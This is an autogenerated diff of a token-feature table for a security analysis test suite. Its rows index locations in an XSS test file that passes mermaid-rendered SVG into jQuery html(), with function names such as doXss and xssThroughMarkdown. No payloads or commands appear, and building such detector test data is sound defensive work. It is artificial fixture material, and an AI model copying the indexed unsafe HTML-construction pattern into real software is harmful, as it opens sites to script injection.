autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:8:98:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:16:98:29 | usesCreateHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:16:98:29 | usesCreateHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:16:98:29 | usesCreateHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | myMermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | myMermaid | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | myMermaid | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | myMermaid | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | myMermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | this | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | this | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:98:32 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | 'arguments' object of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | 'arguments' object of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | exceptional return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | exceptional return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | functio ... });\\n} | assignedToPropName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | functio ... });\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (x) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | functio ... });\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:33:114:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:43:98:43 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:13 | myMermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:13 | myMermaid | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:13 | myMermaid | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:13 | myMermaid | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:13 | myMermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:20 | myMermaid.render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:20 | myMermaid.render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:20 | myMermaid.render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:20 | myMermaid.render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:99:20 | myMermaid.render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | exceptional return of myMerma ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | exceptional return of myMerma ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | exceptional return of myMerma ... \\n }) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | exceptional return of myMerma ... \\n }) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | exceptional return of myMerma ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | myMerma ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | myMerma ... \\n }) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | myMerma ... \\n }) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | myMerma ... \\n }) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:5:101:6 | myMerma ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:15:99:20 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:15:99:20 | render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:15:99:20 | render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:15:99:20 | render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:15:99:20 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:22:99:25 | "id" | CalleeFlexibleAccessPath | myMermaid.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:22:99:25 | "id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:22:99:25 | "id" | calleeImports | mermaid | @@ -23418,6 +153577,21 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:28:99:28 | x | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:28:99:28 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:28:99:28 | x | receiverName | myMermaid | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:99:30 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:99:30 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:99:30 | this | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:99:30 | this | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:99:30 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | 'arguments' object of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | 'arguments' object of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | exceptional return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | exceptional return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | myMermaid.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | functio ... ;\\n } | InputArgumentIndex | 2 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | functio ... ;\\n } | calleeImports | mermaid | @@ -23427,6 +153601,51 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | functio ... ;\\n } | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | functio ... ;\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | functio ... ;\\n } | receiverName | myMermaid | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | return of anonymous function | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:31:101:5 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:99:41:99:43 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:9 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:9 | $ | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:9 | $ | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:9 | $ | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:9 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | $("#foo") | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | exceptional return of $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | exceptional return of $("#foo") | enclosingFunctionName | usesCreateHTML | +| 